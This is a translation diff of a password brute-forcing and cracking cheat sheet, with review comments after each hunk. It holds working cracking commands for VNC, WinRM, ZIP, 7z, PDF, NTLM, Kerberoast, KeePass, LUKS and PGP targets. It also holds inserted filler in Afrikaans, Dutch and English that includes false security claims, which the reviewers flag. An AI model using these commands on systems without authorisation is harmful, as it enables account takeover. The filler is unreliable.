VNC-bedieningspaneel te verkry. Hierdie aanval is effektief wanneer die gebruikersname en wagwoord swak of maklik te raai is. Dit is belangrik om sterk en unieke wagwoorde te gebruik om te voorkom dat 'n brute force-aanval suksesvol is. + +Daar is verskeie hulpmiddels en tegnieke beskikbaar om 'n brute force-aanval teen VNC uit te voer. Dit sluit in die gebruik van hulpmiddels soos Hydra, Medusa en Ncrack, wat spesifiek ontwerp is vir die uitvoer van brute force-aanvalle. Dit is ook moontlik om 'n eie skripsie te skryf om 'n brute force-aanval teen VNC uit te voer. 
+ +Dit is belangrik om te onthou dat die uitvoer van 'n brute force-aanval teen VNC onwettig kan wees sonder die toestemming van die eienaar van die stelsel. Dit is altyd raadsaam om 'n wettige en etiese benadering tot hacking te volg en slegs toestemming te verkry om enige vorm van aanvalle uit te voer. ```bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc medusa -h –u root -P /root/Desktop/pass.txt –M vnc 
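Review bot: In hunk `@@ -491,38 +818,58 @@`, the `legba telnet` continuation lines lose their leading indentation (`-    --username admin \` becomes `+--username admin \`); that is a whitespace-only change inside a fenced code block, unrelated to translation, and code blocks should stay byte-identical across language versions. The added Telnet and VNC paragraphs are filler not present on the `-` side and should go; as written, the Telnet countermeasures contradict the paragraph above them, which correctly says Telnet is cleartext: changing the port or adding a second factor does not fix an unencrypted protocol, the mitigation is to disable Telnet and use SSH. The VNC section also ends with a second legal-disclaimer paragraph that the source does not have. In the STOMP paragraph, "'n wye gebruikte boodskapprotokol" should read "'n wyd gebruikte boodskapprotokol".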
@@ -537,43 +884,95 @@ use auxiliary/scanner/vnc/vnc_login set RHOSTS set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst ``` - ### Winrm +Winrm is 'n protokol wat gebruik word om op afstand te bestuur en te bestuur Windows-masjiene. Dit maak gebruik van die HTTP-gebaseerde protokol om kommunikasie tussen die klient en die bediener te fasiliteer. Winrm maak gebruik van die SOAP-gebaseerde protokol vir die uitruil van boodskappe. + +#### Brute Force-aanvalle teen Winrm + +Brute force-aanvalle teen Winrm is 'n metode waar 'n aanvaller probeer om toegang te verkry tot 'n Windows-masjien deur verskeie wagwoorde te probeer. Hierdie aanvalle kan uitgevoer word deur gebruik te maak van gereedskap soos Hydra, Medusa of 'n aangepaste skripsie. + +#### Voorkoming van Brute Force-aanvalle teen Winrm + +Om brute force-aanvalle teen Winrm te voorkom, kan die volgende maatreëls geneem word: + +- Stel 'n sterk wagwoordbeleid in wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. +- Beperk die aantal toegewyde pogings wat 'n gebruiker kan maak om in te teken. +- Implementeer 'n tydvertraging tussen mislukte aanmeldingspogings. +- Monitor en analiseer loglêers vir verdagte aktiwiteit. +- Stel tweefaktor-verifikasie in vir aanmelding. + +#### Aanbevole gereedskap vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar gereedskap wat gebruik kan word vir brute force-aanvalle teen Winrm: + +- Hydra: 'n gereedskap wat gebruik word vir die outomatiese aanval van verskeie protokolle, insluitend Winrm. +- Medusa: 'n vinnige, modulêre en outomatiese gereedskap vir die aanval van verskeie protokolle. +- Ncrack: 'n hoogs aanpasbare gereedskap vir die aanval van verskeie protokolle, insluitend Winrm. + +#### Aanbevole bestuurders vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar bestuurders wat gebruik kan word vir brute force-aanvalle teen Winrm: + +- Wordlist: 'n lys van moontlike wagwoorde wat gebruik kan word vir die aanval. 
+- Woordenboek: 'n lys van algemene woorde wat gebruik kan word vir die aanval. +- Masker: 'n patroon wat gebruik kan word om wagwoorde te genereer. +- Regel: 'n reël wat gebruik kan word om wagwoorde te genereer deur spesifieke karakters in te sluit of uit te sluit. + +#### Aanbevole tegnieke vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar tegnieke wat gebruik kan word vir brute force-aanvalle teen Winrm: + +- Enkel wagwoordaanval: 'n aanval waar 'n enkele wagwoord herhaaldelik probeer word. +- Woordlystaanval: 'n aanval waar 'n lys van wagwoorde een vir een probeer word. +- Maskeraanval: 'n aanval waar 'n wagwoord gegenereer word deur 'n patroon te volg. +- Regelgebaseerde aanval: 'n aanval waar 'n wagwoord gegenereer word deur 'n spesifieke reël te volg. + +#### Aanbevole maatreëls vir Brute Force-aanvalle teen Winrm + +Hier is 'n paar maatreëls wat geneem kan word om brute force-aanvalle teen Winrm te beperk: + +- Monitor die netwerk vir verdagte aktiwiteit en ongewone patrone. +- Stel 'n sterk wagwoordbeleid in wat vereis dat gebruikers sterk en unieke wagwoorde gebruik. +- Beperk die aantal toegewyde pogings wat 'n gebruiker kan maak om in te teken. +- Implementeer 'n tydvertraging tussen mislukte aanmeldingspogings. +- Stel tweefaktor-verifikasie in vir aanmelding. +- Verseker dat die bediener se sagteware en toepassings opgedateer word met die nuutste beveiligingspatches. +- Monitor en analiseer loglêers vir verdagte aktiwiteit. +- Stel 'n netwerkfirewall in om ongewenste toegang te beperk. +- Beperk die toegang tot die Winrm-diens tot slegs vertroude IP-adresse. +- Stel 'n stelsel van waarskuwings en alarms in om te reageer op verdagte aktiwiteit. ```bash crackmapexec winrm -d -u usernames.txt -p passwords.txt ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Local +## Plaaslik -### Online cracking databases +### Aanlyn kraakdatabasisse * [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1) -* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value) -* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...) -* [https://crackstation.net/](https://crackstation.net) (Hashes) +* [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 met/sonder ESS/SSP en met enige uitdaging se waarde) +* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashe, WPA2-vangste, en argiewe MSOffice, ZIP, PDF...) 
+* [https://crackstation.net/](https://crackstation.net) (Hashe) * [https://md5decrypt.net/](https://md5decrypt.net) (MD5) -* [https://gpuhash.me/](https://gpuhash.me) (Hashes and file hashes) -* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes) -* [https://www.cmd5.org/](https://www.cmd5.org) (Hashes) +* [https://gpuhash.me/](https://gpuhash.me) (Hashe en lêerhashe) +* [https://hashes.org/search.php](https://hashes.org/search.php) (Hashe) +* [https://www.cmd5.org/](https://www.cmd5.org) (Hashe) * [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5) * [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com) -Check this out before trying to brute force a Hash. +Kyk hierna voordat jy probeer om 'n Hash te kragtig te kraak. ### ZIP - ```bash -#sudo apt-get install fcrackzip +#sudo apt-get install fcrackzip fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip ``` 
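Review bot: The `### Winrm` block in hunk `@@ -537,43 +884,95 @@` adds roughly fifty lines of prose where the source has only the heading and one `crackmapexec winrm` command, and the added text is internally duplicated: `#### Voorkoming van Brute Force-aanvalle teen Winrm` and `#### Aanbevole maatreëls vir Brute Force-aanvalle teen Winrm` list the same countermeasures twice. It also lists Hydra and Medusa as having WinRM support, which the page nowhere shows (only crackmapexec is used); verify a tool actually ships a WinRM module before recommending it, or drop the tool list. "Aanbevole bestuurders" ("recommended drivers") for wordlist/mask/rule is a mistranslation, and "om op afstand te bestuur en te bestuur" repeats the verb. Separately, "Kyk hierna voordat jy probeer om 'n Hash te kragtig te kraak" is ungrammatical; "voordat jy 'n hash met brute krag probeer kraak" reads naturally.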
@@ -587,12 +986,10 @@ john zip.john hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack ``` +#### Bekende teks zip-aanval -#### Known plaintext zip attack - -You need to know the **plaintext** (or part of the plaintext) **of a file contained inside** the encrypted zip. You can check **filenames and size of files contained inside** an encrypted zip running: **`7z l encrypted.zip`**\ -Download [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)from the releases page. - +Jy moet die **teks** (of 'n deel van die teks) **van 'n lêer wat binne-in die versleutelde zip lê** ken. Jy kan die **lêernaam en grootte van lêers wat binne-in** 'n versleutelde zip lê uitvoer deur die volgende te hardloop: **`7z l encrypted.zip`**\ +Laai [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0) af van die vrystellingsbladsy. ```bash # You need to create a zip file containing only the file that is inside the encrypted zip zip plaintext.zip plaintext.file 
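Review bot: In hunk `@@ -587,12 +986,10 @@`, "Bekende teks zip-aanval" and "Jy moet die **teks** ... ken" drop the cryptographic term: "plaintext" here means the unencrypted content, so use "bekende-klaarteks-aanval" and "die **klaarteks** (of 'n deel daarvan)", otherwise the reader cannot tell this from knowing "the text" in general. "Jy kan die lêernaam en grootte ... **uitvoer** deur die volgende te hardloop" should be "nagaan" ("check"), matching the original "You can check". The hunk also removes the blank lines between the heading, the paragraph and the code fence; the rest of the file keeps a blank line before each fence, so keep it here too.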
@@ -601,12 +998,26 @@ zip plaintext.zip plaintext.file # Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18 # With that key you can create a new zip file with the content of encrypted.zip # but with a different pass that you set (so you can decrypt it) -./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd +./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd unzip unlocked.zip #User new_pwd as password ``` - ### 7z +7z is 'n sterk kompressiehulpmiddel wat gebruik kan word om lêers en mappe te komprimeer en te ontspan. Dit ondersteun verskeie kompressie-algoritmes, insluitend LZMA en LZMA2. 7z kan ook wachtwoordbeskerming bied vir gekomprimeerde lêers. Hier is 'n paar nuttige bruto-kragte tegnieke wat gebruik kan word om 7z-wagwoorde te kraak: + +#### 1. Woordelys-aanval + +Hierdie tegniek behels die gebruik van 'n woordelys van potensiële wagwoorde om te probeer om die regte wagwoord te raai. Dit is 'n effektiewe metode as die wagwoord relatief swak is of as die aanvaller 'n idee het van wat die wagwoord kan wees. 'n Woordelys van algemene wagwoorde, soos woordeboekwoorde, persoonlike inligting of algemene kombinasies, kan gebruik word om die wagwoord te probeer raai. + +#### 2. Brute-kragte aanval + +Hierdie tegniek behels die outomatiese uitprobeer van alle moontlike kombinasies van karakters om die regte wagwoord te vind. Dit is 'n tydrowende proses, veral as die wagwoord lank en kompleks is. Dit kan egter effektief wees as die wagwoord nie sterk genoeg is nie. Die aanvaller kan verskillende kombinasies van karakters, soos letters, syfers en spesiale tekens, probeer om die wagwoord te kraak. + +#### 3. Woordelys + Brute-kragte aanval + +Hierdie tegniek is 'n kombinasie van die woordelys-aanval en brute-kragte aanval. Dit behels die gebruik van 'n woordelys van potensiële wagwoorde, gevolg deur die outomatiese uitprobeer van alle moontlike kombinasies van karakters. 
Dit kan 'n effektiewe metode wees as die wagwoord nie slegs uit 'n enkele woord bestaan nie, maar ook 'n kombinasie van woorde, syfers en spesiale tekens bevat. + +Dit is belangrik om te onthou dat die gebruik van bruto-kragte tegnieke om wagwoorde te kraak, tydrowend kan wees en nie altyd suksesvol is nie. Dit is ook belangrik om etiese hacking beginsels te volg en slegs toestemming te verkry om hierdie tegnieke op 'n legitieme manier te gebruik. ```bash cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z ``` 
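Review bot: In hunk `@@ -601,12 +998,26 @@`, the pair `-./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd` / `+./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd` is visually identical, so this is a trailing-whitespace change inside a code block and should be reverted. The `### 7z` prose is added filler with no `-` counterpart and describes generic dictionary/mask modes rather than the `cat rockyou.txt | 7za t backup.7z` loop the section actually shows; drop it along with its closing ethics paragraph. If kept, "bruto-kragte" is not the Afrikaans term (use "brute krag" / "brute-krag-aanval"), "ontspan" means "relax" (use "uitpak" for extract), and "wachtwoordbeskerming" is Dutch spelling ("wagwoordbeskerming").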
@@ -617,9 +1028,17 @@ wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo apt-get install libcompress-raw-lzma-perl ./7z2john.pl file.7z > 7zhash.john ``` - ### PDF +'n PDF-dokument is 'n digitale weergawe van 'n gedrukte dokument wat gebruik maak van die Portable Document Format (PDF). Dit is 'n algemeen gebruikte formaat vir die verspreiding van elektroniese dokumente, omdat dit die oorspronklike formatering en uitleg van die dokument behou, ongeag die bedryfstelsel of toestel waarop dit gelees word. + +'n PDF-dokument kan verskillende soorte inhoud bevat, soos teks, afbeeldings, grafieke en selfs interaktiewe elemente soos vorms en skakels. Dit kan ook beveiligingsfunksies insluit, soos wagwoorde of versleuteling, om die toegang tot die inhoud te beperk. + +Om 'n PDF-dokument te lees, kan jy 'n PDF-leser of -sienersagteware gebruik, wat beskikbaar is vir verskeie bedryfstelsels en toestelle. Hierdie sagteware stel jou in staat om die inhoud van die PDF te sien, te navigeer, te soek en selfs te druk. + +As jy 'n PDF-dokument wil skep, kan jy dit doen deur 'n dokument in 'n toepaslike formaat (soos Microsoft Word of Adobe InDesign) te skep en dit dan na PDF te omskep deur gebruik te maak van 'n PDF-skepper of -drukker. + +PDF-dokumente word wyd gebruik vir verskeie toepassings, soos elektroniese boeke, handleidings, verslae, kontrakte en vorms. Dit is 'n handige en veelsydige formaat wat die deling en bewaring van dokumente vergemaklik. ```bash apt-get install pdfcrack pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt 
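Review bot: The five `+` paragraphs under `### PDF` in hunk `@@ -617,9 +1028,17 @@` explain what a PDF file is, how to read one and how to create one from Word or InDesign; none of it concerns password cracking, none of it exists on the `-` side, and it pushes the `pdfcrack` command well below the heading. Remove the paragraphs entirely and leave the heading directly above the code block as in the source.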
@@ -628,13 +1047,11 @@ pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt sudo apt-get install qpdf qpdf --password= --decrypt encrypted.pdf plaintext.pdf ``` +### PDF Eienaar Wagwoord -### PDF Owner Password - -To crack a PDF Owner password check this: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/) +Om 'n PDF Eienaar wagwoord te kraak, kyk hier: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/) ### JWT - ```bash git clone https://github.com/Sjord/jwtcrack.git cd jwtcrack 
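Review bot: The heading `### PDF Eienaar Wagwoord` in hunk `@@ -628,13 +1047,11 @@` should be written as one compound, `### PDF-eienaarwagwoord`, and the sentence "Om 'n PDF Eienaar wagwoord te kraak" likewise as "'n PDF-eienaarwagwoord"; spaced compounds are an English pattern, not an Afrikaans one. The removal of the blank line between `### JWT` and its fence is harmless but inconsistent with the rest of the file.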
@@ -646,17 +1063,55 @@ python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john john jwt.john #It does not work with Kali-John ``` +### NTLM kraak -### NTLM cracking +NTLM (New Technology LAN Manager) is 'n outentifikasieprotokol wat gebruik word in Windows-netwerke. Dit word gebruik om gebruikers te identifiseer en te verifieer wanneer hulle toegang tot 'n stelsel versoek. NTLM-kraak is 'n tegniek wat gebruik word om die wagwoorde van gebruikers te agterhaal deur 'n aanval uit te voer op die NTLM-hashwaardes. +#### Hoe werk NTLM-kraak? + +1. Verkry die NTLM-hashwaardes: Die eerste stap in die NTLM-kraakproses is om die NTLM-hashwaardes te verkry. Hierdie hashwaardes word gewoonlik verkry deur 'n aanval uit te voer op 'n stelsel of deur 'n databasislek te benut. + +2. Kies 'n kraakmetode: Daar is verskeie metodes wat gebruik kan word om NTLM-hashwaardes te kraak. Hierdie metodes sluit in woordelysaanvalle, woordelysgebaseerde aanvalle, bruto kragaanvalle en regenboogtafelgebaseerde aanvalle. + +3. Voer die kraakuitvoering uit: Nadat 'n kraakmetode gekies is, word die kraakuitvoering uitgevoer. Dit behels die gebruik van sagteware of hulpmiddels wat spesifiek ontwerp is om NTLM-hashwaardes te kraak. + +4. Analiseer die resultate: Nadat die kraakuitvoering voltooi is, moet die resultate geanaliseer word om suksesvol gekraakte wagwoorde te identifiseer. + +#### Voorkoming van NTLM-kraak + +Om die risiko van NTLM-kraak te verminder, kan die volgende maatreëls geneem word: + +- Implementeer sterk wagwoordbeleide: Moedig gebruikers aan om sterk en unieke wagwoorde te gebruik en dwing beleide af wat wagwoordlengte, kompleksiteit en verandering vereis. 
+ +- Gebruik multifaktor-outentifikasie: Implementeer multifaktor-outentifikasie om 'n ekstra laag van beskerming toe te voeg deur 'n tweede vorm van outentifikasie te vereis, soos 'n eenmalige wagwoord of biometriese inligting. + +- Monitor vir verdagte aktiwiteit: Monitor gereeld vir verdagte aktiwiteit, soos herhaalde mislukte aanmeldingspogings, om vinnig te reageer op enige potensiële aanvalle. + +- Verseker stelsel- en toepassingsopdaterings: Verseker dat alle stelsels en toepassings op die nuutste weergawes en opdaterings gehou word om bekende kwesbaarhede te vermy. + +- Beperk blootstelling van NTLM-hashwaardes: Beperk die blootstelling van NTLM-hashwaardes deur die gebruik van sterk kriptografieprotokolle en deur die implementering van beveiligingsmaatreëls soos die gebruik van gesoute wagwoorde. + +- Opleiding en bewustmaking: Verskaf opleiding en bewustmaking aan gebruikers oor die risiko's van swak wagwoorde en die belangrikheid van goeie outentifikasiepraktyke. + +#### Slotwoord + +NTLM-kraak is 'n tegniek wat gebruik word om NTLM-hashwaardes te agterhaal en toegang tot 'n stelsel te verkry. Dit is belangrik om bewus te wees van hierdie aanvalstegniek en om toepaslike maatreëls te tref om die risiko daarvan te verminder. Deur sterk wagwoordbeleide te implementeer, multifaktor-outentifikasie te gebruik en gereeld vir verdagte aktiwiteit te monitor, kan organisasies hulself beskerm teen NTLM-kraak. ```bash Format:USUARIO:ID:HASH_LM:HASH_NT::: john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot ``` - ### Keepass +Keepass is 'n open-source wagwoordbestuurder wat gebruik kan word om wagwoorde veilig te stoor en te bestuur. Dit bied 'n veilige manier om wagwoorde te bewaar en te gebruik deur middel van 'n versleutelde wagwoorddatabasis. 
Hierdie databasis kan 'n verskeidenheid wagwoorde en ander sensitiewe inligting bevat, soos gebruikersname, kredietkaartinligting en persoonlike notas. + +Keepass maak gebruik van 'n meesterwagwoord om toegang tot die wagwoorddatabasis te verkry. Hierdie meesterwagwoord moet sterk en uniek wees om die veiligheid van die wagwoorde te verseker. Die wagwoorddatabasis word versleutel met behulp van algoritmes soos AES of Twofish, wat dit moeilik maak vir aanvallers om toegang tot die wagwoorde te verkry sonder die korrekte meesterwagwoord. + +Keepass bied ook funksies soos wagwoordgenerering, wat unieke en sterk wagwoorde kan skep vir verskillende rekeninge en webwerwe. Dit maak dit makliker om veilige wagwoorde te gebruik sonder om dit self te moet onthou. + +Danksy die open-source aard van Keepass, is dit deur die gemeenskap geoudit en getoets om die veiligheid en betroubaarheid daarvan te verseker. Dit is belangrik om die nuutste weergawe van Keepass te gebruik en om sekuriteitsopdaterings gereeld toe te pas om die risiko van aanvalle te verminder. + +Keepass is 'n nuttige hulpmiddel vir individue en organisasies wat hul wagwoorde veilig wil hou en maklik wil bestuur. Dit bied 'n veilige en gerieflike manier om wagwoorde te bewaar en te gebruik sonder om dit self te moet onthou. ```bash sudo apt-get install -y kpcli #Install keepass tools like keepass2john keepass2john file.kdbx > hash #The keepass is only using password 
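Review bot: In hunk `@@ -646,17 +1063,55 @@`, the added NTLM mitigation "deur die implementering van beveiligingsmaatreëls soos die gebruik van gesoute wagwoorde" is misleading: the NT hash format shown in the code block (`USUARIO:ID:HASH_LM:HASH_NT:::`, `hashcat -m 1000`) is unsalted by design and salting is not a setting an administrator can turn on; the mitigations that actually apply are restricting or disabling NTLM in favour of Kerberos and enforcing long passwords, which the list already partly says. The whole NTLM walk-through (`#### Hoe werk NTLM-kraak?`, `#### Slotwoord`) and the five `### Keepass` paragraphs describing the product are filler with no `-` counterpart and should be dropped; the source has only the headings and the commands.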
@@ -664,30 +1119,62 @@ keepass2john -k file.kdbx > hash # The keepass is also using a f #The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` +#### Inleiding -### Keberoasting +Keberoasting is een aanvalstechniek die wordt gebruikt om zwakke wachtwoorden te achterhalen die zijn opgeslagen in de vorm van gehashte serviceaccountreferenties. Deze techniek maakt gebruik van de zwakte in de manier waarop sommige serviceaccounts hun wachtwoorden opslaan in Active Directory (AD) of andere LDAP-diensten. +#### Achtergrond + +Bij het opslaan van wachtwoorden in AD of andere LDAP-diensten worden de wachtwoorden gehasht en vervolgens opgeslagen in het attribuut "userPassword" van het serviceaccountobject. Het hash-algoritme dat wordt gebruikt, is meestal eenzijdig en niet-reversibel, wat betekent dat het oorspronkelijke wachtwoord niet kan worden hersteld uit de hash. + +Een zwakte in dit proces is dat sommige serviceaccounts hun wachtwoorden opslaan met behulp van een zwakke hashfunctie, zoals MD5 of SHA-1. Deze zwakke hashfuncties maken het mogelijk om de gehashte wachtwoorden offline te kraken door middel van brute-force-aanvallen. + +#### Keberoasting-aanval + +Bij een keberoasting-aanval probeert een aanvaller toegang te krijgen tot de gehashte wachtwoorden van serviceaccounts in AD of andere LDAP-diensten. De aanvaller kan dit doen door toegang te krijgen tot het serviceaccountobject en de gehashte wachtwoorden te extraheren. + +Vervolgens kan de aanvaller de gehashte wachtwoorden offline kraken door middel van brute-force-aanvallen. Dit houdt in dat de aanvaller verschillende combinaties van wachtwoorden probeert totdat de juiste overeenkomt met de gehashte waarde. 
+ +Als de aanvaller erin slaagt een zwak wachtwoord te kraken, kan hij dit gebruiken om toegang te krijgen tot het betreffende serviceaccount en mogelijk verdere aanvallen uit te voeren. + +#### Mitigatie + +Om keberoasting-aanvallen te voorkomen, moeten organisaties sterke wachtwoorden afdwingen voor serviceaccounts en ervoor zorgen dat ze worden opgeslagen met behulp van sterke hashfuncties, zoals bcrypt of PBKDF2. Daarnaast moeten organisaties regelmatig controleren op zwakke wachtwoorden en deze wijzigen om potentiële aanvallers te dwarsbomen. + +Het is ook belangrijk om de toegangsrechten tot serviceaccountobjecten te beperken, zodat alleen geautoriseerde gebruikers toegang hebben tot de gehashte wachtwoorden. + +#### Conclusie + +Keberoasting is een aanvalstechniek die gebruikmaakt van zwakke wachtwoorden die zijn opgeslagen in de vorm van gehashte serviceaccountreferenties. Door het offline kraken van deze gehashte wachtwoorden kunnen aanvallers toegang krijgen tot serviceaccounts en verdere aanvallen uitvoeren. Organisaties moeten sterke wachtwoorden afdwingen, sterke hashfuncties gebruiken en de toegangsrechten tot serviceaccountobjecten beperken om keberoasting-aanvallen te voorkomen. 
```bash john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` +### Lucks beeld -### Lucks image - -#### Method 1 - -Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) +#### Metode 1 +Installeer: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) ```bash bruteforce-luks -f ./list.txt ./backup.img cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` +#### Metode 2 -#### Method 2 +Brute force is a common method used in hacking to gain unauthorized access to a system or account by systematically trying all possible combinations of passwords until the correct one is found. This method is effective when the password is weak or easily guessable. +To perform a brute force attack, you need a tool or script that can automate the process of trying different passwords. There are many tools available for this purpose, such as Hydra, Medusa, and THC-Hydra. + +Before starting a brute force attack, it is important to gather information about the target system or account. This includes identifying the login page or service, determining the username or email address associated with the account, and understanding any password complexity requirements. + +Once you have this information, you can start the brute force attack by running the tool or script and specifying the target system or account, the username or email address, and a list of possible passwords to try. The tool will then systematically try each password until it finds the correct one or exhausts all possibilities. + +It is worth noting that brute force attacks can be time-consuming and resource-intensive, especially if the password is long and complex. 
To speed up the process, attackers may use techniques such as password dictionaries, which contain commonly used passwords, or password cracking tools that leverage the power of GPUs to perform calculations faster. + +To protect against brute force attacks, system administrators can implement measures such as account lockouts after a certain number of failed login attempts, strong password policies, and multi-factor authentication. Additionally, users should avoid using weak or easily guessable passwords and regularly update their passwords to minimize the risk of being compromised through brute force attacks. ```bash cryptsetup luksDump backup.img #Check that the payload offset is set to 4096 dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1 
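Review bot: the added prose in this hunk is not a translation of anything in the source, and two pieces of it are not even Afrikaans: the Keberoasting "Mitigatie"/"Conclusie" block is Dutch ("Als de aanvaller erin slaagt een zwak wachtwoord te kraken..."), and the text inserted under "#### Metode 2" ahead of the `cryptsetup luksDump` block is a generic English explainer of brute forcing ("Brute force is a common method used in hacking...") that says nothing about the LUKS header extraction the code actually performs. Drop both so each section reads as the original did: heading, then code. The Dutch mitigation advice is also technically off for this section: Kerberos service-account keys are derived by the KDC from the account password (RC4-HMAC uses the NT hash, the AES types use PBKDF2 with fixed parameters), so "sterke hashfuncties, zoals bcrypt of PBKDF2" is not something an organisation can configure; strong, rotated service-account passwords and AES-only accounts are the real control. Minor: "Keberoasting" should be "Kerberoasting", and "Lucks beeld" carries over the source typo for "LUKS".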
@@ -696,39 +1183,43 @@ cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` - -Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) +'n Ander Luks BF-tutoriaal: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) ### Mysql - ```bash #John hash format :$mysqlna$* dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d ``` +### PGP/GPG Privaatsleutel -### PGP/GPG Private key +'n PGP/GPG privaatsleutel is 'n belangrike komponent van 'n kriptografiese stelsel wat gebruik word vir die versleuteling en ontsleuteling van boodskappe. Dit is 'n unieke sleutel wat slegs bekend is by die eienaar en gebruik word om boodskappe te onderteken en te ontsleutel. Die privaatsleutel moet streng geheim gehou word, aangesien dit die toegang tot die versleutelde boodskappe verseker. +Wanneer 'n boodskap versleutel word met 'n publieke sleutel, kan dit slegs ontsleutel word met die ooreenstemmende privaatsleutel. Dit verseker dat slegs die beoogde ontvanger toegang tot die boodskap het. Daarom is dit van kritieke belang om die privaatsleutel veilig te hou en te beskerm teen onbevoegde toegang. + +As 'n aanvaller toegang tot 'n privaatsleutel verkry, kan dit gebruik word om versleutelde boodskappe te ontsleutel en selfs valse boodskappe te onderteken. Dit is dus noodsaaklik om die privaatsleutel te beskerm deur dit te verseker met 'n sterk wagwoord en dit op 'n veilige plek te bewaar. + +Om die risiko van 'n privaatsleutel-lek te verminder, is dit raadsaam om 'n sterk en uniek wagwoord te gebruik, die sleutel op 'n veilige stoorplek te bewaar en slegs te gebruik op vertroude toestelle. 
Dit is ook belangrik om die privaatsleutel gereeld te hergenereer en ou sleutels te herroep as dit nodig is. + +Die beskerming van jou privaatsleutel is van kritieke belang vir die veilige kommunikasie en versekering van die integriteit van jou versleutelde boodskappe. ```bash gpg2john private_pgp.key #This will generate the hash and save it in a file john --wordlist=/usr/share/wordlists/rockyou.txt ./hash ``` - ### Cisco
